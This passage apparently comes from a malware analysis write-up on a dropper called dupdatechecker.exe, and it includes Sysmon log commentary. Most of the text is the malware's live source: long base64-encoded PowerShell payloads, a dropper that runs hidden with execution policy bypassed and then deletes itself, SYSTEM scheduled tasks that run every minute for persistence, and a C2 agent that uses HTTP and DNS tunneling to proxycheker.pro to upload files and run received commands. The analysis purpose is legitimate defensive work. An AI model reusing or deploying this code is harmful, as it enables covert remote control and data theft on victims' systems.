IAA9ACAAQAAoACkAOwANAAoACQAkAGQAYQByACAAPQAgAC0AagBvAGkAbgAgACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAKAAwACAALgAuACAAOQApACAALQBDAG8AdQBuAHQAIAAxADUAKQA7AA0ACgAJACQAYwByACAAPQAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACgAMAAgAC4ALgAgADkAKQAgAC0AQwBvAHUAbgB0ACAAMgA7AA0ACgAJACQAZABhAHIAIAA9ACAAJABkAGEAcgAuAEkAbgBzAGUAcgB0ACgAJABjAHIAWwAwAF0ALAAgACQAcgBpAGQASQBuAC4AVAByAGkAbQAoACkAKQAuAEkAbgBzAGUAcgB0ACgAKAAkAGMAcgBbADEAXQApACwAIAAkAHsAZwBsAG8AYgBhAGwAOgAkAGEAaQBkAH0AKQA7AA0ACgAJACQAYQBkAHIAIAA9ACAAIgAkACgAJABzAHIAdgByACkAPwB2AGUAcgBzAGkAbwBuAD0AJAAoACQAZABhAHIAKQA1ACQAKAAkAGEAYwApADcAJAAoACQAYwByAFsAMABdACkAJAAoACQAYwByAFsAMQBdACkAIgA7AA0ACgAJAHIAZQB0AHUAcgBuACAAJABhAGQAcgA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABsAGQAQwBmAGcADQAKAHsADQAKAAkAJABjAGYAZwBBAGQAcgAgAD0AIAAkAGUAbgB2ADoAVABNAFAAIAArACAAIgBcAGMAZgBnAC4AaQBuAGkAIgA7AA0ACgAJAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAoACQAYwBmAGcAQQBkAHIAKQApAA0ACgAJAHsADQAKAAkACQAkAGwAaQBuAGUAcwAgAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAgACgAJABjAGYAZwBBAGQAcgApACAAfAAgAFcAaABlAHIAZQAgAHsAIAAkAF8AIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAXgBcAHMAKwAkACcAIAB9AA0ACgAJAAkAZgBvAHIAZQBhAGMAaAAgACgAJABsAGkAbgBlACAAaQBuACAAJABsAGkAbgBlAHMAKQANAAoACQAJAHsADQAKAAkACQAJACQAYQAgAD0AIAAkAGwAaQBuAGUAIAAtAHMAcABsAGkAdAAgACcALAAnAA0ACgAJAAkACQBzAHcAaQB0AGMAaAAgACgAJABhAFsAMABdACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAIgB1AHMAcgAiAHsAIAAkAFAAVQBzAGUAcgAgAD0AIAAkAGEAWwAxAF0AIAArACAAIgAiADsAIAB9AA0ACgAJAAkACQAJACIAcABhAHMAIgB7ACAAJABQAFAAYQBzAHMAIAA9ACAAJABhAFsAMQBdACAAKwAgACIAIgA7ACAAfQANAAoACQAJAAkACQAiAHUAcwBlACIAewAgACQAUABVAHMAZQAgAD0AIAAkAGEAWwAxAF0AIAArACAAIgAiADsAIAB9AA0ACgAJAAkACQAJACIAcwByAHYAIgB7ACAAJABQAFMAZQByAHYAZQByACAAPQAgACQAYQBbADEAXQAgACsAIAAiACIAOwAgAH0ADQAKAAkACQAJAAkAIgBwAHIAdAAiAHsAIAAkAFAAUABvAHIAdAAgAD0AIAAkAGEAWwAxAF0AIAArACAAIgAiADsAIAB9AA0ACgAJAAkACQAJACIAZABvAG0AIgB7ACAAJABQAEQAbwBtACAAPQAgACQAYQBbADEAXQAgACsAIAAiACIAOwAgAH0ADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAaQBmACAAKAAkAFAAUwBlAHIAdgBlAHIAIAAtAGEAbgBkACAAJABQAFUAcwBlACAALQBlAHEAIAAiAHQAIgApAA0ACgAJAHsADQAKAAkACQAkAHUAcgBpACAAPQAgACIAaAB0AHQAcAA6AC8ALwAiACAAKwAgACQAUABTAGUAcgB2AGUAcgAgACsAIAAiADoAIgAgACsAIAAkAFAAUABvAHIAdAA7AA0ACgAJAAkAJABwAHIAbwB4AHkAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAKAAkAHUAcgBpACwAIAAkAHQAcgB1AGUAKQA7AA0ACgAJAAkAJABwAHIAbwB4AHkALgBjAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAKAAkAFAAVQBzAGUAcgAsACAAJABQAFAAYQBzAHMALAAgACQAUABEAG8AbQApAA0ACgAJAAkAJAB7AGcAbABvAGIAYQBsADoAJAB3AGMAfQAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsADQAKAAkACQAkAHsAZwBsAG8AYgBhAGwAOgAkAHcAYwB9AC4AcAByAG8AeAB5ACAAPQAgACQAcAByAG8AeAB5ADsADQAKAAkAfQANAAoACQBlAGwAcwBlAA0ACgAJAHsADQAKAAkACQAkAHsAZwBsAG8AYgBhAGwAOgAkAHcAYwB9ACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABzAHkAcwB0AGUAbQAuAG4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwANAAoACQB9AA0ACgB9AA0ACgBsAGQAQwBmAGcAOwANAAoAaQBmACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAewBnAGwAbwBiAGEAbAA6ACQAcgBQAGEAdABoAH0AKQApACAAewAgAE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAFAAYQB0AGgAIAAkAHsAZwBsAG8AYgBhAGwAOgAkAHIAUABhAHQAaAB9ADsAIAB9AA0ACgAkAGEAZAByACAAPQAgAGEAZAByAEMAdAAgACIAMgA0ADMANQAxADIANAAzADUAMQAwACIAIAAiADAAIgANAAoAJAByAGkAZAAgAD0AIAAoACQAewBnAGwAbwBiAGEAbAA6ACQAdwBjAH0ALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGEAZAByACkAIAArACAAIgAgACIAKQAuAFQAcgBpAG0AKAApADsADQAKAGkAZgAgACgAJAByAGkAZAApAA0ACgB7AA0ACgAJAGkAZgAgACgAJAByAGkAZAAuAGwAZQBuAGcAdABoACAALQBlAHEAIAAxADEAKQANAAoACQB7AA0ACgAJAAkAJABhAGQAcgAgAD0AIABhAGQAcgBDAHQAIAAiACQAcgBpAGQAIgAgACIAMQAiAA0ACgAJAAkAJAByACAAPQAgACQAewBnAGwAbwBiAGEAbAA6ACQAdwBjAH0ALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGEAZAByACkAOwANAAoACQAJACQAcgBjAG4AdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBEAGUAZgBhAHUAbAB0AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByACkAKQA7AA0ACgAJAAkAJABhAGQAcgAgAD0AIABhAGQAcgBDAHQAIAAiACQAcgBpAGQAIgAgACIAMwAiAA0ACgAJAAkAJAB7AGcAbABvAGIAYQBsADoAJAB3AGMAfQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACQAYQBkAHIAKQA7AA0ACgAJAAkAaQBmACAAKAAkAHIAaQBkAC4ARQBuAGQAcwBXAGkAdABoACgAIgAwACIAKQApAA0ACgAJAAkAewANAAoACQAJAAkAJAByAGMAbgB0ACAAPQAgACQAcgBjAG4AdAAgAHwAIAA/ACAAewAgACQAXwAuAHQAcgBpAG0AKAApACAALQBuAGUAIAAiACIAIAB9ADsADQAKAAkACQAJACQAcgBlAHMAIAArAD0AIAAkAHIAYwBuAHQALgBTAHAAbABpAHQAKAAiACYAIgApACAAfAAgAGYAbwByAGUAYQBjAGgALQBvAGIAagBlAGMAdAAgAHsAIAAkAF8AIAB8ACAAaQBlAHgAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgAH0ADQAKAAkACQBzAG4AZAByACAAJAByAGkAZAAgACQAcgBlAHMADQAKAAkACQB9AA0ACgAJAAkAZQBsAHMAZQBpAGYAIAAoACQAcgBpAGQALgBFAG4AZABzAFcAaQB0AGgAKAAiADEAIgApACkADQAKAAkACQB7AA0ACgAJAAkACQAkAGEAZAByACAAPQAgACQAcgBjAG4AdAAuAFQAcgBpAG0AKAApADsADQAKAAkACQAJAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGEAZAByACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJABhAGQAcgBTACAAPQAgAGEAZAByAEMAdAAgACIAJAByAGkAZAAiACAAIgA0ACIADQAKAAkACQAJAAkAJAB7AGcAbABvAGIAYQBsADoAJAB3AGMAfQAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAkAGEAZAByAFMALAAgACQAYQBkAHIAKQA7AA0ACgAJAAkACQB9AA0ACgAJAAkACQBlAGwAcwBlAA0ACgAJAAkACQB7AA0ACgAJAAkACQAJAHMAbgBkAHIAIAAkAHIAaQBkACAAIgA0ADAANAAiADsADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAAkAZQBsAHMAZQBpAGYAIAAoACQAcgBpAGQALgBFAG4AZABzAFcAaQB0AGgAKAAiADIAIgApACkADQAKAAkACQB7AA0ACgAJAAkACQAkAHMAYQB2AEEAZAByACAAPQAgACIAJAB7AGcAbABvAGIAYQBsADoAJAByAFAAYQB0AGgAfQBcACQAcgBpAGQAIgA7AA0ACgAJAAkACQAkAHIAYwBuAHQAIAB8ACAAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABzAGEAdgBBAGQAcgA7AA0ACgAJAAkACQBzAG4AZAByACAAJAByAGkAZAAgACIAMgAwADAAPAA+ACQAcwBhAHYAQQBkAHIAIgA7AA0ACgAJAAkAfQANAAoACQB9AA0ACgB9AA0ACgA=\";\r\nfunction runByVBS\r\n{\r\n\tif (-not (Test-Path -Path ${global:$address1}))\r\n\t{md ${global:$address1}}\r\n\tif (Test-Path -Path ${global:$address1})\r\n\t{\r\n\t\t\"set Shell0 = CreateObject(`\"wscript.shell`\")`nShell0.run `\"powershell.exe -exec bypass -enc \" + ${global:$http_ag} + \"`\", 0, false`nset Shell1 = CreateObject(`\"wscript.shell`\")`nShell1.run `\"powershell.exe -exec bypass -enc \" + ${global:$dns_ag} + \"`\", 0, false\" | Out-File \"${global:$address1}\\GoogleUpdateTasks.vbs\"\r\n\t\tschtasks /create /F /sc minute /mo 1 /tn \"\\UpdateTasks\\JavaUpdatesTasksHosts\" /tr \"wscript /b \\`\"${global:$address1}\\GoogleUpdateTasks.vbs\\`\"\";\r\n\t\tschtasks /create /F /ru SYSTEM /sc minute /mo 1 /tn \"\\UpdateTasks\\JavaUpdatesTasksHosts\" /tr \"wscript /b \\`\"${global:$address1}\\GoogleUpdateTasks.vbs\\`\"\";\r\n\t}\r\n}\r\nrunByVBS;\r\n\r\n\r\n ";
 using (StreamWriter streamWriter = new StreamWriter(text + "\\rUpdateChecker.ps1"))
 {
 streamWriter.Write(value);
 streamWriter.Close();
 }
 string arguments = string.Concat(new string[]
 {
 "/c powershell -exec bypass -window hidden -nologo -command ",
 text,
 "\\rUpdateChecker.ps1 & ping 127.0.0.1 -n 6 > nul & del ",
 text,
 "\\rUpdateChecker.ps1"
 });
 new Process
 {
 StartInfo = new ProcessStartInfo
 {
 WindowStyle = ProcessWindowStyle.Hidden,
 FileName = "cmd.exe",
 Arguments = arguments
 }
 }.Start();
}

However, as you read through the code, you will see that on execution, this PE file drops the file rUpdateChecker.ps1 in the following folder C:\\ProgramData\\Windows\\Microsoft\\java. And, if Sysmon successfully created an event for this activity, then you should also see that record in your Elasticsearch as shown in the figure below:

dupdatechecker

As you can see, the [event_data][CommandLine] field, cmd.exe executed with the /c flag (/c flag – Run Command and then terminate) to run the PowerShell command. The PowerShell command ran with several other flags. The last flag -command is responsible for executing the following:

  • Running the script C:\ProgramData\Windows\Microsoft\java\rUpdateChecker.ps1 
  • Pinging to localhost (likely used as a timer before deleting itself as you can see in the next bulletpoint)
  • Deleting the script C:\ProgramData\Windows\Microsoft\java\rUpdateChecker.ps1 

Finally, by looking at the figure above you can also see that the parent process (located in the fields [event_data][ParentImage]) was the PE file dupdatechecker.exe. Alright, lets determine the functionally of the PowerShell script rUpdateChecker.ps1. Command Line Execution for this script will appear like this:

powershell -exec bypass -window hidden -nologo -command C:\ProgramData\Windows\Microsoft\java\rUpdateChecker.ps1

Trojan Dropper

Filename: rUpdateChecker.ps1
MD5 Hash: 06d537af8c43f65fc467781b01047e5c

This PowerShell script rupdatechecker.ps1 contains the following data:

${global:$address1} = $env:ProgramData + "\Windows\Microsoft\java";
${global:$dns_ag} = "aQBmACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAALQBGAGkAbAB0AGUAcgAgACgAIgBOAGEAbQBlAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwAgAEEATgBEACAAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAATABJAEsARQAgACcAJQAiACsAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAE0AeQBDAG8AbQBtAGEAbgBkAC4ATgBhAG0AZQAuAFQAcgBpAG0AKAApACsAIgAlACcAIgApACkALgBsAGUAbgBnAHQAaAAgAC0AbAB0ACAAMgApACAAewANAAoAJABhAGkAZAA9AHcAaABvAGEAbQBpACAAfAAgACUAewBbAGIAeQB0AGUAWwBdAF0AWwBjAGgAYQByAFsAXQBdACQAXwAgAC0AagBvAGkAbgAgACcAJwB9ACAAIAB8ACAAJQB7ACQAXwAuAHMAdQBiAHMAdAByAGkAbgBnACgAMAAsADEAMgApAH0AIAB8ACAAJQB7ACQAXwAgACsAIAAiADEAMgAwADEAMgAwADAAMQAxADIAMgA0ACIAfQAgAHwAIAAlAHsAJABfAC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAwACwAMQAyACkAfQA7ACQAcwBwACAAPQAgACQAZQBuAHYAOgBUAEUATQBQADsADQAKACQAcwBtACAAPQAgACQAZgBhAGwAcwBlADsAJABjAHQAIAA9ACAAMAA7ACQAZgBiACAAPQAgAEAAKAApADsAJAByAG4AIAA9ACAAIgAwADAAMAAiADsAJABhAGMAIAA9ACAAIgAwACIAOwAkAHIAdQBuACAAPQAgACQAdAByAHUAZQA7ACQAZQBjAD0AMAA7AA0ACgBXAGgAaQBsAGUAIAAoACQAcgB1AG4AKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AbQAgADIAMAAwADsADQAKAGkAZgAoACQAZQBjACAALQBnAGUAIAA1ACkAewBlAHgAaQB0AH0ADQAKAGkAZgAgACgAJABjAHQAIAAtAGwAdAAgADEAMAApACAAewAgACQAcgBuACAAPQAgACIAMAAwACQAKAAkAGMAdAApACIAOwAgAH0AZQBsAHMAZQBpAGYAIAAoACQAYwB0ACAALQBsAHQAIAAxADAAMAApACAAewAgACQAcgBuACAAPQAgACIAMAAkACgAJABjAHQAKQAiADsAIAB9AGUAbABzAGUAIAB7ACAAJAByAG4AIAA9ACAAIgAkACgAJABjAHQAKQAiADsAIAB9AA0ACgAkAHIAYQBuAGQAIAA9ACAALQBqAG8AaQBuACAAKABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAoADEAMAAgAC4ALgAgADkAOQApACAALQBDAG8AdQBuAHQAIAAoACUAewAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACgAMQAgAC4ALgAgADYAKQAgAH0AKQApADsADQAKAHQAcgB5AHsAJABsAGEAcwB0AEEAZABkAHIAZQBzAHMAPQAgACIAJAAoACQAcgBhAG4AZAApACQAKAAkAGEAYwApACQAKAAkAHIAbgApADcAJAAoACQAYQBpAGQAKQAuAHAAcgBvAHgAeQBjAGgAZQBrAGUAcgAuAHAAcgBvACIAOwANAAoAJAByAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ARABuAHMAXQA6ADoARwBlAHQASABvAHMAdABBAGQAZAByAGUAcwBzAGUAcwAoACQAbABhAHMAdABBAGQAZAByAGUAcwBzACkAOwB9AGMAYQB0AGMAaAB7ACQAZQBjACsAKwA7AGMAbwBuAHQAaQBuAHUAZQA7AH0ADQAKACQAcgBlAHMAdQBsAHQAIAA9ACAAJAByAHQAWwAwAF0ALgBJAFAAQQBkAGQAcgBlAHMAcwBUAG8AUwB0AHIAaQBuAGcAOwAkAHIAcwAgAD0AIAAkAHIAZQBzAHUAbAB0AC4AUwBwAGwAaQB0ACgAJwAuACcAKQA7AA0ACgBpAGYAIAAoACgAJAByAHMAWwAwAF0AIAAtAGUAcQAgADEAKQAgAC0AYQBuAGQAIAAoACQAcgBzAFsAMQBdACAALQBlAHEAIAAyACkAIAAtAGEAbgBkACAAKAAkAHIAcwBbADIAXQAgAC0AZQBxACAAMwApACkAewAkAHMAbQAgAD0AIAAkAGYAYQBsAHMAZQA7ACQAYQBjACAAPQAgACIAMAAiADsADQAKACQAbABlACAAPQAgACQAZgBiAC4ATABlAG4AZwB0AGgAOwBpAGYAIAAoACQAZgBiAFsAJABsAGUAbgAtADEAXQAgAC0AZQBxACAAMAAgAC0AYQBuAGQAIAAkAGYAYgBbACQAbABlAG4ALQAyAF0AIAAtAGUAcQAgADAAKQANAAoAewAkAGYAYgB0ACAAPQAgACQAZgBiAFsAMAAgAC4ALgAgACgAJABsAGUAIAAtACAAMwApAF0AOwB9AGUAbABzAGUAaQBmACAAKAAkAGYAYgBbACQAbABlACAALQAgADEAXQAgAC0AZQBxACAAMAApAHsAJABmAGIAdAAgAD0AIAAkAGYAYgBbADAAIAAuAC4AIAAoACQAbABlACAALQAgADIAKQBdADsAfQBlAGwAcwBlAHsAJABmAGIAdAAgAD0AIAAkAGYAYgA7AH0ADQAKAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAHMAcAAsACAAJABmAGIAdAApADsAJABmAGIAIAA9ACAAQAAoACkAOwAkAGMAdAAgAD0AIAAwADsAYgByAGUAYQBrADsAfQANAAoAaQBmACAAKAAkAHMAbQApAHsAaQBmACAAKAAkAGMAdAAgAC0AZwB0ACAAMgA1ADAAKQAgAHsAJABjAHQAIAA9ACAAMAA7AH0ADQAKAGkAZgAgACgAJABjAHQAIAAtAGUAcQAgACQAcgBzAFsAMwBdACkAewAkAGYAYgAgACsAPQAgACQAcgBzAFsAMABdADsAJABmAGIAIAArAD0AIAAkAHIAcwBbADEAXQA7ACQAZgBiACAAKwA9ACAAJAByAHMAWwAyAF0AOwAkAGMAdAAgAD0AIAAkAGMAdAAgACsAIAAzADsAfQB9AA0ACgBpAGYAIAAoACgAJAByAHMAWwAwAF0AIAAtAGUAcQAgADIANAApACAALQBhAG4AZAAgACgAJAByAHMAWwAxAF0AIAAtAGUAcQAgADEAMgA1ACkAKQB7ACQAcwBwACAAKwA9ACAAIgBcACIAIAArACAAJAByAHMAWwAyAF0AIAArACAAIgAiACAAKwAgACQAcgBzAFsAMwBdADsAJABzAG0AIAA9ACAAJAB0AHIAdQBlADsAJABhAGMAIAA9ACAAIgAxACIAOwAkAGMAdAAgAD0AIAAwADsAfQANAAoAaQBmACAAKAAoACQAcgBzAFsAMABdACAALQBlAHEAIAAxADEAKQAgAC0AYQBuAGQAIAAoACQAcgBzAFsAMQBdACAALQBlAHEAIAAyADQAKQAgAC0AYQBuAGQAIAAoACQAcgBzAFsAMgBdACAALQBlAHEAIAAyADMANwApACAALQBhAG4AZAAgACgAJAByAHMAWwAzAF0AIAAtAGUAcQAgADEAMQAwACkAKQAgAHsAJAByAHUAbgA9ACQAZgBhAGwAcwBlADsAYgByAGUAYQBrADsAfQB9AA0ACgANAAoAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAcwBwACkALgBsAGUAbgBnAHQAaAAgAC0AZwB0ACAAMABrAGIAKQB7AA0ACgAJAGkAZgAgACgAJABzAHAALgBFAG4AZABzAFcAaQB0AGgAKAAiADAAIgApACkADQAKAAkAewANAAoACQAJACQAZgBjACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAcwBwACAAfAAgAD8AIAB7ACAAJABfAC4AdAByAGkAbQAoACkAIAAtAG4AZQAgACIAIgAgAH0AOwANAAoACQAJACQAcgBlACAAKwA9ACAAJABmAGMALgBTAHAAbABpAHQAKAAiACYAIgApACAAfAAgAGYAbwByAGUAYQBjAGgALQBvAGIAagBlAGMAdAAgAHsAIAAkAF8AIAB8ACAAaQBlAHgAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgAH0ADQAKAAkAfQANAAoACQBlAGwAcwBlAGkAZgAgACgAJABzAHAALgBFAG4AZABzAFcAaQB0AGgAKAAiADEAIgApACkADQAKAAkAewANAAoACQAJAE0AbwB2AGUALQBJAHQAZQBtACAALQBwAGEAdABoACAAJABzAHAAIAAtAGQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACgAJABzAHAAKwAiAC4AcABzADEAIgApACAALQBGAG8AcgBjAGUAOwANAAoACQB9AA0ACgAJAGUAbABzAGUAaQBmACAAKAAkAHMAcAAuAEUAbgBkAHMAVwBpAHQAaAAoACIAMgAiACkAKQANAAoACQB7AA0ACgAJAAkATQBvAHYAZQAtAEkAdABlAG0AIAAtAHAAYQB0AGgAIAAkAHMAcAAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuACAAKAAkAHMAcAArACIALgB2AGIAcwAiACkAIAAtAEYAbwByAGMAZQA7AA0ACgAJAH0ADQAKAH0ADQAKAH0ADQAKAA==";
${global:$http_ag} = "JABzAHIAdgByACAAPQAgACIAaAB0AHQAcAA6AFwAXAAiACAAKwAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEQAbgBzAF0AOgA6AEcAZQB0AEgAbwBzAHQAQQBkAGQAcgBlAHMAcwBlAHMAKAAiAHcAdwB3AC4AcAByAG8AeAB5AGMAaABlAGsAZQByAC4AcAByAG8AIgApACAAKwAiAC8AdQBwAGQAYQB0AGUAXwB3AGEAcABwAC4AYQBzAHAAeAAiADsADQAKACQAawA9AGcAZQB0AG0AYQBjACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAB8ACAAJQB7ACAAJABfACAALQBtAGEAdABjAGgAIAAnACgAPwA6AFsAMAAtADkAYQAtAGYAXQB7ADIAfQBbADoALQBdACkAewA1AH0AWwAwAC0AOQBhAC0AZgBdAHsAMgB9ACcAIAB9ADsADQAKAGkAZgAoACQAawApAHsAJAB7AGcAbABvAGIAYQBsADoAJABhAGkAZAB9ACAAPQAgACQAbQBhAHQAYwBoAGUAcwBbADAAXQAgAC0AcgBlAHAAbABhAGMAZQAgACIALQAiACwAIAAiACIAOwB9ACAAZQBsAHMAZQAgAHsAJAB7AGcAbABvAGIAYQBsADoAJABhAGkAZAB9ACAAPQAgAHcAaABvAGEAbQBpACAAfAAgACUAewBbAGIAeQB0AGUAWwBdAF0AWwBjAGgAYQByAFsAXQBdACQAXwAgAC0AagBvAGkAbgAgACcAJwB9ACAAIAB8ACAAJQB7ACQAXwAuAHMAdQBiAHMAdAByAGkAbgBnACgAMAAsADEAMQApAH0AIAB8ACAAJQB7ACQAXwAgACsAIAAiADEAMgAwADEAMgAwADAAMQAxADIAMgA0ACIAfQAgAHwAIAAlAHsAJABfAC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAwACwAMQAxACkAfQB9AA0ACgAkAHsAZwBsAG8AYgBhAGwAOgAkAHIAUABhAHQAaAB9ACAAPQAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAIAArACAAIgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEoAYQB2AGEAXAAiACAAKwAgACQAewBnAGwAbwBiAGEAbAA6ACQAYQBpAGQAfQA7AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABzAG4AZAByAA0ACgB7AA0ACgAJAHAAYQByAGEAbQAoACQAZgBuAGEAbQBlACwAIAAkAGMAbgB0ACkADQAKAAkAJABhAGQAcgAgAD0AIABhAGQAcgBDAHQAIAAiACQAZgBuAGEAbQBlACIAIAAiADIAIgANAAoACQAkAHsAZwBsAG8AYgBhAGwAOgAkAHcAYwB9AC4AVQBwAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGEAZAByACwAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBEAGUAZgBhAHUAbAB0AC4ARwBlAHQAQgB5AHQAZQBzACgAJABjAG4AdAApACkAKQA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABhAGQAcgBDAHQADQAKAHsADQAKAAkAcABhAHIAYQBtACAAKAAkAHIAaQBkAEkAbgAsACAAJABhAGMAKQANAAoACQAkAGMAcgAgAD0AIABAACgAKQA7AA0ACgAJACQAZABhAHIAIAA9ACAAQAAoACkAOwANAAoACQAkAGQAYQByACAAPQAgAC0AagBvAGkAbgAgACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAKAAwACAALgAuACAAOQApACAALQBDAG8AdQBuAHQAIAAxADUAKQA7AA0ACgAJACQAYwByACAAPQAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACgAMAAgAC4ALgAgADkAKQAgAC0AQwBvAHUAbgB0ACAAMgA7AA0ACgAJACQAZABhAHIAIAA9ACAAJABkAGEAcgAuAEkAbgBzAGUAcgB0ACgAJABjAHIAWwAwAF0ALAAgACQAcgBpAGQASQBuAC4AVAByAGkAbQAoACkAKQAuAEkAbgBzAGUAcgB0ACgAKAAkAGMAcgBbADEAXQApACwAIAAkAHsAZwBsAG8AYgBhAGwAOgAkAGEAaQBkAH0AKQA7AA0ACgAJACQAYQBkAHIAIAA9ACAAIgAkACgAJABzAHIAdgByACkAPwB2AGUAcgBzAGkAbwBuAD0AJAAoACQAZABhAHIAKQA1ACQAKAAkAGEAYwApADcAJAAoACQAYwByAFsAMABdACkAJAAoACQAYwByAFsAMQBdACkAIgA7AA0ACgAJAHIAZQB0AHUAcgBuACAAJABhAGQAcgA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABsAGQAQwBmAGcADQAKAHsADQAKAAkAJABjAGYAZwBBAGQAcgAgAD0AIAAkAGUAbgB2ADoAVABNAFAAIAArACAAIgBcAGMAZgBnAC4AaQBuAGkAIgA7AA0ACgAJAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAoACQAYwBmAGcAQQBkAHIAKQApAA0ACgAJAHsADQAKAAkACQAkAGwAaQBuAGUAcwAgAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAgACgAJABjAGYAZwBBAGQAcgApACAAfAAgAFcAaABlAHIAZQAgAHsAIAAkAF8AIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAXgBcAHMAKwAkACcAIAB9AA0ACgAJAAkAZgBvAHIAZQBhAGMAaAAgACgAJABsAGkAbgBlACAAaQBuACAAJABsAGkAbgBlAHMAKQANAAoACQAJAHsADQAKAAkACQAJACQAYQAgAD0AIAAkAGwAaQBuAGUAIAAtAHMAcABsAGkAdAAgACcALAAnAA0ACgAJAAkACQBzAHcAaQB0AGMAaAAgACgAJABhAFsAMABdACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAIgB1AHMAcgAiAHsAIAAkAFAAVQBzAGUAcgAgAD0AIAAkAGEAWwAxAF0AIAArACAAIgAiADsAIAB9AA0ACgAJAAkACQAJACIAcABhAHMAIgB7ACAAJABQAFAAYQBzAHMAIAA9ACAAJABhAFsAMQBdACAAKwAgACIAIgA7ACAAfQANAAoACQAJAAkACQAiAHUAcwBlACIAewAgACQAUABVAHMAZQAgAD0AIAAkAGEAWwAxAF0AIAArACAAIgAiADsAIAB9AA0ACgAJAAkACQAJACIAcwByAHYAIgB7ACAAJABQAFMAZQByAHYAZQByACAAPQAgACQAYQBbADEAXQAgACsAIAAiACIAOwAgAH0ADQAKAAkACQAJAAkAIgBwAHIAdAAiAHsAIAAkAFAAUABvAHIAdAAgAD0AIAAkAGEAWwAxAF0AIAArACAAIgAiADsAIAB9AA0ACgAJAAkACQAJACIAZABvAG0AIgB7ACAAJABQAEQAbwBtACAAP